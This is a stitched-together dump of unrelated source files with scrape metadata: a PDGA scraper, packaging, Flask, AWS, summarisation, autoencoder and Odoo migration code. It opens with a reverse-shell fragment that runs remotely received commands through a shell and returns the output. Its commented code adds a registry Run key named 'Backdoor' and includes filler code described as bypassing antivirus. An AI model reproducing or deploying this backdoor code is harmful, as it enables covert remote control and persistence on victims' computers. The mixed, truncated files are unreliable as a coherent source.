reliable_send(admin)
except:
reliable_send("[-] Cannot perform the task")
else:
proc=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)
result=proc.stdout.read() +proc.stderr.read()
reliable_send(result.decode('utf-8'))
# location=os.environ["appdata"]+"\\winhar32.exe"
# if not os.path.exists(location):
# shutil.copy(sys.executable,location)
# subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "' + location +'"', shell=True)
# file_name=sys._MEIPASS+"\image.jpg"
# try:
# subprocess.Popen(file_name,shell=True)
# except:
# # to bypass antivirus
# num=1
# num2=3
# num3=num+num2
# file_name=sys._MEIPASS+"\image.jpg"
try:
subprocess.Popen(file_name,shell=True)
except:
# tp bypass antivirus
num=1
num2=3
num3=num+num2
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection()
sock.close()
# check the ip address
| sharshith1312/reverse_shell | rstest1.py | rstest1.py | py | 5,215 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dumps",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "mss.mss",
"line_number": 33,
... |
15386994551 | #!/usr/bin/env python3
"""Bundle the game and the launcher, sign the new app protocol version, and create a package."""
import argparse
import os
import os.path
import logging
import shutil
import tarfile
import tempfile
import zipfile
from zipfile import ZIP_DEFLATED
parser = argparse.ArgumentParser(description=__doc__.replace('\n', ' '))
parser.add_argument('out_dir')
parser.add_argument('platform', choices={'macOS', 'Windows', 'Linux'})
parser.add_argument('game_dir')
parser.add_argument('timestamp')
parser.add_argument(
'--verbose', '-v',
action='store_const', const=logging.DEBUG, default=logging.INFO,
)
def main() -> None:
args = parser.parse_args()
logging.basicConfig(level=args.verbose)
temp_dir = tempfile.mkdtemp()
for root in [args.game_dir]:
for name in os.listdir(root):
path = os.path.join(root, name)
tmppath = os.path.join(temp_dir, name)
if os.path.isdir(path):
if not os.path.isdir(tmppath): # skip duplicate dirs
shutil.copytree(path, tmppath)
else:
if not os.path.isfile(tmppath): # skip duplicate files
shutil.copy2(path, tmppath)
logging.info('Copy: %s -> %s', path, tmppath)
# create the archive
os.makedirs(args.out_dir, exist_ok=True)
if args.platform.lower() == 'macos':
archive_path = os.path.join(args.out_dir, 'macOS.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c.app/Contents/MacOS/9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'linux':
archive_path = os.path.join(args.out_dir, 'Linux.tar.gz')
executable_path = os.path.join(
temp_dir,
'9c'
)
os.chmod(executable_path, 0o755)
with tarfile.open(archive_path, 'w:gz') as archive:
for arcname in os.listdir(temp_dir):
name = os.path.join(temp_dir, arcname)
archive.add(name, arcname=arcname)
logging.info('Added: %s <- %s', arcname, name)
elif args.platform.lower() == 'windows':
archive_path = os.path.join(args.out_dir, 'Windows.zip')
with zipfile.ZipFile(archive_path, 'w', ZIP_DEFLATED) as archive:
basepath = os.path.abspath(temp_dir) + os.sep
for path, dirs, files in os.walk(temp_dir):
logging.debug('Walk: %r, %r, %r', path, dirs, files)
for name in files + dirs:
fullname = os.path.abspath(os.path.join(path, name))
assert fullname.startswith(basepath)
relname = fullname[len(basepath):]
archive.write(fullname, relname)
logging.info('Added: %s <- %s', relname, fullname)
else:
return parser.exit(1, f'unsupported platform: {args.platform}')
logging.info('Created an archive: %s', archive_path)
shutil.rmtree(temp_dir)
if __name__ == '__main__':
main()
| FioX0/PandoraReborn | tools/pack/pack.py | pack.py | py | 3,340 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "logging.... |
31982185532 | import requests
from bs4 import BeautifulSoup
from datetime import datetime
import os.path
import csv
import threading
from queue import Queue
# Proxies for BURP - update requests if you want to use this proxy
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
playersFile = 'sample_corrected.txt'
ids = Queue()
# Please be nice to the PDGA site :)
THREADS = 1
class Player:
def __init__(self, pdga):
self.store = []
self.failure = False
self.pdga = pdga
r = requests.get(f'https://www.pdga.com/player/{pdga}')
soup = BeautifulSoup(r.text, 'html.parser')
pi = soup.find('ul', class_='player-info info-list')
self.today = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
# if access denied|page not found go to next player
self.check_failures(soup)
if self.failure:
return
player = soup.h1.get_text()
# Fields that will always exist for all members
self.name = player.split(' #')[0].replace(',', ' ')
self.status = pi.find('li', class_='membership-status').text.split('Status: ')[1].split(' ')[0]
# The remaining fields may not be on the profile so I had to check to see if they exist before parsing
expiration = pi.find('li', class_='membership-status').text.split('Status: ')[1]
if 'until' in expiration:
self.expiration = expiration.split('until ')[1].replace(')', '')
else:
self.expiration = expiration.split('as of ')[1].replace(')', '')
self.joindate = pi.find('li', class_='join-date')
if self.joindate:
self.joindate = self.joindate.text.split('Member Since: ')[1].split(' ')[0]
else:
self.joindate = ''
try:
location = pi.find('li', class_='location').text.split('Classification:')[0].split('Location: ')[1].split(
',')
except:
location = ''
if location:
# City, State, Country
if len(location) >= 3:
self.city = location[0].lstrip()
self.state = location[1].lstrip()
self.country = location[2].split('Member Since: ')[0].lstrip()
# Only State/Prov, Country
if len(location) == 2:
self.city = 'N/A'
self.state = location[0].lstrip()
self.country = location[1].split('Member Since: ')[0].lstrip()
# Country Only
if len(location) == 1:
self.city = 'N/A'
self.state = 'N/A'
self.country = location[0].split('Member Since: ')[0].lstrip()
self.loclink = pi.find('li', class_='location').find('a')['href']
else:
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = pi.find('li', class_='current-rating')
if self.rating:
self.rating = self.rating.text.split('Current Rating: ')[1].split(' ')[0]
else:
self.rating = ''
self.classification = pi.find('li', class_='classification')
if self.classification:
self.classification = self.classification.text.split('Classification: ')[1]
else:
self.classification = ''
self.events = pi.find('li', class_='career-events')
if self.events:
self.events = self.events.text.split('Career Events: ')[1].replace(',', '')
else:
self.events = ''
self.earnings = pi.find('li', class_='career-earnings')
if self.earnings:
self.earnings = self.earnings.text.split('Career Earnings: ')[1].replace(',', '').strip('$')
else:
self.earnings = '0'
self.wins = pi.find('li', class_='career-wins disclaimer')
if self.wins:
self.wins = self.wins.text.split('Career Wins: ')[1]
else:
self.wins = '0'
self.store_vals()
self.write_data()
# Set values to store in file
def store_vals(self):
self.store = [self.pdga, self.name, self.city, self.state, self.country, self.loclink, self.classification,
self.joindate, self.status, self.expiration, self.rating, self.events, self.wins, self.earnings,
self.today]
print(self.store)
# Append player to file
def write_data(self):
with open(playersFile, 'a+', newline='', encoding='utf-8') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(self.store)
# Display detailed data on each player
def verbose(self):
print(f'Scrape Date: {self.today}')
print(f"ID: {self.pdga}")
print(f"Name: {self.name}")
print(f"Status: {self.status}")
print(f"Expiration: {self.expiration}")
print(f"City: {self.city}")
print(f"State: {self.state}")
print(f"Location Link: {self.loclink}")
print(f"Country: {self.country}")
print(f"Rating: {self.rating}")
print(f"Classification: {self.classification}")
print(f"Events: {self.events}")
print(f"Wins: {self.wins}")
print(f"Earnings: {self.earnings}")
# Check if player page exists before trying to scrape profile
def check_failures(self, soup):
fail = ['Page not found', 'Access denied']
if any(x in soup.h1.get_text() for x in fail):
print(f'Not a valid player: {self.pdga}')
self.name = ''
self.status = ''
self.start = ''
self.expiration = ''
self.city = ''
self.state = ''
self.country = ''
self.loclink = ''
self.rating = ''
self.classification = ''
self.earnings = ''
self.events = ''
self.wins = ''
self.joindate = ''
self.store_vals()
self.failure = True
# Create player file if it doesn't exist. If it does exist return the next user to scrape.
def check_file():
header = ['id', 'name', 'city', 'state', 'country', 'loclink', 'classification', 'joindate', 'status', 'expiration',
'rating', 'events', 'wins', 'earnings', 'scrape date']
if os.path.exists(playersFile):
print(f'Appending to already created file - {playersFile}')
return get_recent_scrape()
else:
print(f'File created - {playersFile}')
with open(playersFile, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writer.writerow(header)
return 0
# Get total number of PDGA players to set limit of scraping
def find_last_player():
print('\nFinding number of registered PDGA members...')
pl = requests.get(
'https://www.pdga.com/players?FirstName=&LastName=&PDGANum=&Status=All&Gender=All&Class=All&MemberType=All'
'&City=&StateProv=All&Country=All&Country_1=All&UpdateDate=&order=PDGANum&sort=desc')
psoup = BeautifulSoup(pl.text, 'html.parser')
last_player = psoup.find('table', class_='views-table cols-8').find('td', class_='views-field views-field-PDGANum '
'active pdga-number').get_text(
).rstrip()
print(f'There are {int(last_player)} registered PDGA members!!!')
return int(last_player)
# Get the last PDGA member scraped and saved
def get_recent_scrape():
# Since threading can cause the last saved players to be written out of order, check the last THREADS lines
# and use the highest PDGA number found there as the last one saved
with open(playersFile, "r", encoding="utf-8", errors="ignore") as scraped:
# final_line = (scraped.readlines()[-1].split(',')[0])
print(f'Checking last {THREADS} lines to find last saved player')
last_lines = []
scrape = scraped.readlines()
for line in range(1, int(THREADS) + 1):
# print(f"Line: {line} - {scrape[-line].split(',')[0]}")
last_lines.append(scrape[-line].split(',')[0])
nextScrape = int(max(last_lines)) + 1
print(f'Last lines: {last_lines}')
print(f"\nThe last player scraped was PDGA #{max(last_lines)}")
print(f"Continuing scraping on PDGA #{nextScrape}...")
return nextScrape
# Return [next player to scrape, most recent registered member]
def get_range():
return range(check_file(), find_last_player())
# Scrape function for threading
def scrape_player():
global ids
while True:
pdga = ids.get()
Player(pdga)
ids.task_done()
# Fill queue with remaining players
def fill_queue():
id_range = get_range()
for id in id_range:
ids.put(id)
print(f'\nAdding PDGA members from {id_range[0]} to {id_range[1]}')
print(f'Queue of IDs full with {ids.qsize()} members to go!')
if __name__ == '__main__':
fill_queue()
print('Starting scraping of members...')
for i in range(THREADS):
print(f'Starting thread #{i}')
t = threading.Thread(target=scrape_player)
t.start()
| zcrosman/PDGAscrape | PDGAscrape.py | PDGAscrape.py | py | 9,296 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "queue.Queue",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
... |
40144939486 | from flask import request
from werkzeug.utils import secure_filename
from db import db
from models import Img
def upload_images(pic_list, private, user_id):
#import pdb; pdb.set_trace()
for pic in pic_list:
filename = secure_filename(pic.filename)
mimetype = pic.mimetype
if not filename or not mimetype or "image" not in str(mimetype):
return False
img = Img(img=pic.read(), user_id=user_id, private=private, name=filename, mimetype=mimetype)
db.session.add(img)
db.session.commit()
return True
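# --- Illustrative route using this helper (a sketch, not part of the original app). ---
# The blueprint name, form field names and redirect target are assumptions for the example.
# from flask import Blueprint, redirect
# upload_bp = Blueprint("upload", __name__)
#
# @upload_bp.route("/upload", methods=["POST"])
# def handle_upload():
#     pics = request.files.getlist("pics")
#     private = bool(request.form.get("private"))
#     if not upload_images(pics, private, user_id=1):
#         return "Invalid image upload", 400
#     return redirect("/")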
| elmanreasat/imagipy | controllers/upload.py | upload.py | py | 573 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "werkzeug.utils.secure_filename",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "models.Img",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "db.db.session.add",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "db.db.ses... |
12087004714 | from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import spacy,os
import argparse
import re
from tqdm import tqdm
from collections import OrderedDict
import string
import numpy as np
from spacy.lang.en import English
import time
nl = English()
import sys
import pandas as pd
repeat = 5
data = []
doc = []
l3 = []
summary = []
hypothesis = ""
word_count = []
pair_similarity = []
summary_string = []
def count_word(index):
global doc
Doc = nl(doc[index])
tokens = [t.text for t in Doc]
tokens = [t for t in tokens if len(t.translate(t.maketrans('', '', string.punctuation + string.whitespace))) > 0] # + string.digits
return len(tokens)
def store_word_count():
global word_count,doc
word_count = []
for i in range(0,len(doc)):
word_count.append(count_word(i))
def maximum(index, toPrint=0):
global summary, pair_similarity
length = len(summary)
if(length!=0):
max=0
for i in range(length):
a=pair_similarity[index][summary[i]]
if(a>max):
max=a
if toPrint:
print(str(summary[i])+" -> "+str(a))
return max
else:
return 0
def count_sum(summary):
sum=0
length = len(summary)
for i in range(length):
sum+=count_word(summary[i])
return sum
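# Maximal Marginal Relevance (MMR), as implemented by mmr_sorted below: each
# candidate sentence i is scored as
#     lambda_ * l3[i] - (1 - lambda_) * maximum(i)
# where l3[i] is the sentence's highest TF-IDF similarity to any other sentence
# (its relevance proxy) and maximum(i) is its highest similarity to the sentences
# already selected (the redundancy penalty). Sentences are picked greedily until
# the summary reaches the requested word length.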
def mmr_sorted(lambda_, doc, length):
global word_count, pair_similarity, summary
#print('Inside MMR')
print(length)
l3 = []
vectorizer = TfidfVectorizer(smooth_idf=False)
X = vectorizer.fit_transform(doc)
y = X.toarray()
rows = y.shape[0]
cols = y.shape[1]
pair_similarity = []
for i in range(rows):
max=-1
pair_similarity.append([])
for j in range(rows):
if(j!=i):
a = np.sum(np.multiply(y[i],y[j]))
pair_similarity[-1].append(a)
if(a>max):
max=a
else:
pair_similarity[-1].append(1)
l3.append(max)
store_word_count()
l = len(doc)
count = 0
last = -1
summary = []
summary_word_count = 0
while(1):
if (summary_word_count < length):
max=-1
for i in range(l):
a = maximum(i)
mmrscore = lambda_*l3[i] - (1-lambda_)*a
if(mmrscore >= max):
max = mmrscore
ind = i
summary.append(ind)
summary_word_count += word_count[ind]
else:
#print('Bye')
break
def listToString():
global summary_string, word_count, hypothesis, summary, doc
summary_string = []
leng = 0
for i in summary:
if doc[i] not in summary_string:
summary_string.append(doc[i])
leng += word_count[i]
hypothesis = "".join(summary_string)
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', default = 'data/text/', type = str, help = 'Folder containing textual data')
parser.add_argument('--summary_path', default = 'data/summaries/', type = str, help = 'Folder to store features of the textual data')
parser.add_argument('--length_file', default = 'data/length.txt', type = str, help = 'Path to file containing summary length')
args = parser.parse_args()
print('Generating summary in ...'+args.summary_path)
num_docs = len(os.listdir(args.data_path))
X1 = pd.read_csv(args.length_file, sep="\t", header=None)
for i in tqdm(range(0,num_docs)):
length1=X1[1][i]
#length2=X2[1][i]
doc = []
with open(os.path.join(args.data_path,X1[0][i]), 'r') as file:
for x in file:
if x != '\n':
doc.append(x)
lamda=0.6
#for j in lamda:
mmr_sorted(lamda,doc,length1)
listToString()
f= open(os.path.join(args.summary_path,X1[0][i]),"w+")
n = f.write(hypothesis)
f.close()
hypothesis=""
| Law-AI/summarization | extractive/MMR/MMR.py | MMR.py | py | 4,098 | python | en | code | 139 | github-code | 36 | [
{
"api_name": "spacy.lang.en.English",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "string.punctuation",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "string.whitespace",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "... |
11936036688 | from typing import Any, Optional, TYPE_CHECKING
import logging
from ..common.utils import deepmerge
from .execution_method import ExecutionMethod
from .aws_settings import INFRASTRUCTURE_TYPE_AWS, AwsSettings
if TYPE_CHECKING:
from ..models import (
Task,
TaskExecution
)
logger = logging.getLogger(__name__)
class AwsBaseExecutionMethod(ExecutionMethod):
def __init__(self, name: str,
task: Optional['Task'] = None,
task_execution: Optional['TaskExecution'] = None,
aws_settings: Optional[dict[str, Any]] = None) -> None:
super().__init__(name, task=task,
task_execution=task_execution)
if aws_settings is None:
self.aws_settings = self.merge_aws_settings(task=task,
task_execution=task_execution)
else:
self.aws_settings = AwsSettings.parse_obj(aws_settings)
@staticmethod
def merge_aws_settings(task: Optional['Task'],
task_execution: Optional['TaskExecution']) -> AwsSettings:
settings_to_merge: list[dict[str, Any]] = [ {} ]
if task:
if task.run_environment.aws_settings:
settings_to_merge.append(task.run_environment.aws_settings)
if task.infrastructure_settings and \
(task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task.infrastructure_settings)
if task_execution and task_execution.infrastructure_settings and \
(task_execution.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
settings_to_merge.append(task_execution.infrastructure_settings)
return AwsSettings.parse_obj(deepmerge(*settings_to_merge))
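# Note on the merge above (an illustrative reading, assuming deepmerge gives later
# dicts precedence): run environment settings form the base, task-level
# infrastructure settings override them, and task-execution-level settings override
# both, so e.g. a 'region' set on the task execution wins over the run environment's.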
def compute_region(self) -> Optional[str]:
region = self.aws_settings.region
if (not region) and self.task:
infra = self.task.infrastructure_settings
if infra and (self.task.infrastructure_type == INFRASTRUCTURE_TYPE_AWS):
region = infra.get('region')
if (not region) and infra.get('network'):
region = infra['network'].get('region')
if not region:
run_environment = self.task.run_environment
re_aws_settings = run_environment.aws_settings
if re_aws_settings:
region = re_aws_settings.get('region')
if (not region) and re_aws_settings.get('network'):
region = re_aws_settings['network'].get('region')
return region
def enrich_task_settings(self) -> None:
if not self.task:
raise RuntimeError("enrich_task_settings(): No Task found")
aws_settings_dict = self.task.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
# TODO: scheduling URLs
def enrich_task_execution_settings(self) -> None:
if not self.task_execution:
raise RuntimeError("enrich_task_execution_settings(): No Task Execution found")
aws_settings_dict = self.task_execution.infrastructure_settings
if aws_settings_dict:
aws_settings = AwsSettings.parse_obj(aws_settings_dict)
aws_settings.update_derived_attrs(execution_method=self)
self.task_execution.infrastructure_settings = deepmerge(
aws_settings_dict, aws_settings.dict())
| CloudReactor/task_manager | server/processes/execution_methods/aws_base_execution_method.py | aws_base_execution_method.py | py | 3,685 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "execution_method.ExecutionMethod",
"line_number": 19,
"usage_type": "name"
},
{
"api_name":... |
3219242168 | import sys
sys.path.append('../VQ-VAE')
from auto_encoder2 import VQ_CVAE
import argparse
from torch import optim
from torchvision import transforms
import fpa_dataset
parser = argparse.ArgumentParser(description='Train an autoencoder for hand depth image reconstruction')
parser.add_argument('-r', dest='dataset_root_folder', required=True, help='Root folder for dataset')
parser.add_argument('--split-filename', default='', help='Dataset split filename')
parser.add_argument('-e', dest='num_epochs', type=int, required=True,
help='Total number of epochs to train')
parser.add_argument('--use-cuda', dest='use_cuda', action='store_true', default=False,
help='Whether to use cuda for training')
parser.add_argument('-l', dest='epoch_log', type=int, default=10,
help='Log interval, in epochs')
parser.add_argument('--batch-size', type=int, default=1, help='Batch size')
args = parser.parse_args()
args.use_cuda = True
transform_depth = transforms.Compose([transforms.ToTensor()])
lr = 2e-4
d = 128
k = 256
num_channels_in = 1
num_channels_out = 1
model = VQ_CVAE(d=d, k=k, num_channels_in=num_channels_in, num_channels_out=num_channels_out)
if args.use_cuda:
model = model.cuda()
optimizer = optim.Adam(model.parameters(), lr=lr)
scheduler = optim.lr_scheduler.StepLR(optimizer, 10, 0.5)
train_loader = fpa_dataset.DataLoaderTracking(root_folder=args.dataset_root_folder,
type='train', transform_color=None,
transform_depth=transform_depth,
batch_size=args.batch_size,
split_filename=args.split_filename,)
for epoch_idx in range(args.num_epochs - 1):
epoch = epoch_idx + 1
continue_batch_end_ix = -1
for batch_idx, (data, _) in enumerate(train_loader):
if batch_idx < continue_batch_end_ix:
print('Continuing... {}/{}'.format(batch_idx, continue_batch_end_ix))
continue
optimizer.zero_grad()
if args.use_cuda:
data = data.cuda()
outputs = model(data)
loss = model.loss_function(data, *outputs)
loss.backward()
optimizer.step()
a = 0 | pauloabelha/handy | train_autoencoder.py | train_autoencoder.py | py | 2,275 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torchvision.transf... |
8755383285 | # -*- coding: utf-8 -*-
import json
import logging
from datetime import datetime, date, timedelta
from odoo import api, fields, models
from odoo.addons.muk_dms.models import dms_base
logger = logging.getLogger('FOLLOW-UP')
AVAILABLE_PRIORITIES = [
('0', u'Normale'),
('1', u'Basse'),
('2', u'Haute'),
('3', u'Très haute'),
]
class OFFollowupProject(models.Model):
_name = 'of.followup.project'
_inherit = 'mail.thread'
_description = "Suivi des projets"
_order = "priority desc, reference_laying_date, id desc"
@api.model
def _init_group_of_followup_project_not_migrated(self):
# We use a function triggered from the XML data rather than an auto_init, because at auto_init time
# the group does not exist yet.
# If the migration has not been performed, add the group group_of_followup_project_not_migrated to
# all users
if not self.env['ir.config_parameter'].sudo().get_param('of.followup.migration', False):
group_not_migrated = self.env.ref('of_followup.group_of_followup_project_not_migrated')
group_user = self.env.ref('base.group_user')
if group_not_migrated not in group_user.implied_ids:
group_user.write({'implied_ids': [(4, group_not_migrated.id)]})
def _get_order_values(
self, project, mapping_project_tags, default_of_kanban_step_id, done_of_kanban_step_id,
in_progress_of_kanban_step_id):
"""Helper that return a dict of values to write on a Sale depending of the Project followup"""
otag_ids = []
if project.tag_ids:
otag_ids = [mapping_project_tags[pt.id] for pt in project.tag_ids]
kanban_step_id = in_progress_of_kanban_step_id
if project.state in ('done', 'cancel'):
kanban_step_id = done_of_kanban_step_id
elif not project.reference_laying_date:
kanban_step_id = default_of_kanban_step_id
if not kanban_step_id:
kanban_step_id = default_of_kanban_step_id
return {
'of_priority': project.priority,
'of_notes': project.notes,
'of_info': project.info,
'of_manual_laying_date': project.manual_laying_date,
'of_laying_week': project.laying_week,
'of_reference_laying_date': project.reference_laying_date,
'of_force_laying_date': project.force_laying_date,
'of_sale_followup_tag_ids': otag_ids,
'of_kanban_step_id': kanban_step_id
}
def _update_tables_from_sale_values(self, order_values_to_upd):
def _get_sql_set_string(values):
order_obj = self.env['sale.order']
sql_set_str = ""
len_values = len(values)
for i, (k, v) in enumerate(values.items(), 1):
separator = ', ' if i < len_values else ' '
if not v and order_obj._fields[k].type in ['char', 'text', 'selection', 'date']:
sql_set_str += "%s = %s%s" % (k, 'NULL', separator)
elif v and (order_obj._fields[k].type in ['char', 'text'] or isinstance(v, (str, unicode))):
sql_set_str += "%s = '%s'%s" % (k, v.replace("'", "''"), separator)
else:
sql_set_str += "%s = %s%s" % (k, v, separator)
return sql_set_str
for order_id, order_values in order_values_to_upd.items():
partner_id = order_values.pop('partner_id')
followup_tags_ids = order_values.pop('of_sale_followup_tag_ids')
activities = order_values.pop('of_crm_activity_ids') if 'of_crm_activity_ids' in order_values else []
order_upd_sql = "UPDATE sale_order " \
"SET %s" \
"WHERE id = %s" % (_get_sql_set_string(order_values), order_id)
# update the columns of the sale_order
self._cr.execute(order_upd_sql)
# insert the tags in the relation table of the M2M
for tag_id in followup_tags_ids:
self._cr.execute(
'INSERT INTO sale_order_followup_tag_rel (order_id, tag_id) VALUES (%s, %s)',
(order_id, tag_id)
)
# insert the activities linked to the Sale in their table
for activity in activities:
self._cr.execute(
'INSERT INTO "of_crm_activity" ("create_uid", "uploaded_attachment_id", "type_id", '
'"user_id", "vendor_id", "description", "deadline_date", "sequence", "order_id", '
'"title", "write_uid", "state", "write_date", "report", "create_date", "load_attachment", '
'"origin", "active", "partner_id", "trigger_type") VALUES '
'(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, now(), %s, now(), %s, %s, %s, %s, %s);',
(
activity['create_uid'], None, activity['activity_id'], activity['create_uid'],
activity['vendor_id'], activity['summary'], activity['date_deadline'] or None,
activity['sequence'], order_id, activity['summary'] or None, activity['write_uid'],
activity['state'], None, False, 'sale_order', True, partner_id, 'at_creation'
)
)
def _followup_data_migration(self):
"""
Migration of the Project followup data into the new fields of the linked Order.
Migration of Project followup tasks and related records into CRM activities, CRM tags, etc.
"""
cr = self._cr
# Follow-up data migration
ir_config_obj = self.env['ir.config_parameter']
logger.info('_followup_data_migration START')
if not ir_config_obj.get_param('of.followup.migration', False):
self = self.with_context(lang='fr_FR')
crm_activity_obj = self.env['crm.activity']
followup_task_obj = self.env['of.followup.task']
followup_task_type_obj = self.env['of.followup.task.type']
followup_project_obj = self.env['of.followup.project']
sale_followup_tag_obj = self.env['of.sale.followup.tag']
followup_project_tag_obj = self.env['of.followup.project.tag']
sale_order_kanban_obj = self.env['of.sale.order.kanban']
# of.followup.project.tag -> of.sale.followup.tag
logger.info(' of.followup.project.tag -> of.sale.followup.tag')
project_tags = followup_project_tag_obj.search([])
mapping_project_tags = {ptag.id: sale_followup_tag_obj.create(
{'name': ptag.name, 'color': ptag.color}).id for ptag in project_tags}
# of.followup.task.type -> crm.activity (loaded via data XML) so we build a data mapping dict
logger.info(' of.followup.task.type -> crm.activity')
task_type_planif_id = self.env.ref('of_followup.of_followup_task_type_planif').id
task_type_vt_id = self.env.ref('of_followup.of_followup_task_type_vt').id
followup_type_values = followup_task_type_obj.with_context(active_test=False).search_read(
['|', ('predefined_task', '=', False), ('id', 'in', [task_type_planif_id, task_type_vt_id])],
['name', 'short_name'])
mapping_task_type = {}
for data in followup_type_values:
act_id = crm_activity_obj.create(
{'name': data['name'], 'of_short_name': data['short_name'], 'of_object': 'sale_order'}).id
k = '%s,%s' % (data['id'], data['short_name'])
mapping_task_type[k] = act_id
# of.followup.task -> of.crm.activity
logger.info(' of.followup.task -> of.crm.activity')
# get the tasks ids
tasks_query = "SELECT DISTINCT(OFT.id) " \
"FROM of_followup_task OFT " \
"INNER JOIN of_followup_project OFP ON OFP.id = OFT.project_id " \
"INNER JOIN of_followup_task_type OFTT ON OFTT.id = OFT.type_id " \
"WHERE OFTT.predefined_task IS NOT TRUE OR OFT.type_id IN %s;"
cr.execute(tasks_query, (tuple([task_type_planif_id, task_type_vt_id]),))
tasks_ids = cr.fetchall()
tasks_ids = map(lambda t: t[0], tasks_ids)
            # create sale activities from the follow-up tasks and prepare order data from the project linked to each task
project_data = {}
for task in followup_task_obj.browse(tasks_ids):
project = task.project_id
type_id = task.type_id.id
partner_id = project.order_id.partner_id.id or False
short_name = task.type_id.short_name
k = '%s,%s' % (type_id, short_name)
activity_state = 'planned' # default value
if task.state_id.final_state:
activity_state = 'done'
if project:
if not project_data.get(project):
project_data[project] = {'partner_id': partner_id, 'of_crm_activity_ids': []}
                    # try to preload the deadline date depending on the current follow-up's stage
date_deadline = False
if project.reference_laying_date:
stage_code_tr = {
's': 0,
's+': 1,
's-2': -2,
's-4': -4,
's-6': -6,
's-8': -8
}
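                        # The stage code encodes a week offset relative to the reference laying date
                        # (e.g. 's-2' = two weeks before, 's+' = one week after). The deadline is
                        # preloaded as reference_laying_date + offset * 7 days, then snapped back to
                        # the Monday of that week below. Example (illustrative dates): reference date
                        # 2020-03-18 with code 's-2' gives 2020-03-04, snapped to Monday 2020-03-02.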
reference_laying_date = datetime.strptime(project.reference_laying_date, '%Y-%m-%d')
task_stage = task.state_id.stage_id
if task_stage and stage_code_tr.get(task_stage.code):
days_nbr = stage_code_tr.get(task_stage.code) * 7
date_deadline = reference_laying_date + timedelta(days=days_nbr)
# take the start day of the week for this date
start_date = date_deadline - timedelta(days=date_deadline.weekday())
date_deadline = start_date.strftime('%Y-%m-%d')
if mapping_task_type.get(k):
project_data[project]['of_crm_activity_ids'].append({
'sequence': task.sequence,
'summary': task.name,
'date_deadline': date_deadline,
'activity_id': mapping_task_type.get(k),
'state': activity_state,
'user_id': task.project_id.user_id.id or None,
'vendor_id': task.project_id.vendor_id.id or None,
'create_uid': task.create_uid.id or None,
'write_uid': task.write_uid.id or None
})
order_values_to_upd = {}
# of.followup.project -> sale.order
logger.info(' of.followup.project -> sale.order')
done_project_ids = []
default_of_kanban_step_id = self.env.ref('of_sale_kanban.of_sale_order_kanban_new').id
done_of_kanban_step_id = sale_order_kanban_obj.search([('name', '=', u"Terminé")]).id
in_progress_of_kanban_step_id = sale_order_kanban_obj.search([('name', '=', u"En cours")]).id
for project, data in project_data.items():
values = self._get_order_values(
project, mapping_project_tags, default_of_kanban_step_id, done_of_kanban_step_id,
in_progress_of_kanban_step_id)
values.update(data)
order_values_to_upd[project.order_id.id] = values
done_project_ids.append(project.id)
            # other projects that haven't yet been migrated from the follow-up tasks
if done_project_ids:
projects_query = "SELECT DISTINCT(OFP.id) " \
"FROM of_followup_project OFP " \
"WHERE OFP.id NOT IN %s;"
cr.execute(projects_query, (tuple(done_project_ids),))
else:
projects_query = "SELECT DISTINCT(OFP.id) FROM of_followup_project OFP;"
cr.execute(projects_query)
project_ids = cr.fetchall()
project_ids = map(lambda p: p[0], project_ids)
followup_projects = followup_project_obj.browse(project_ids)
for project in followup_projects:
values = self._get_order_values(
project, mapping_project_tags, default_of_kanban_step_id, done_of_kanban_step_id,
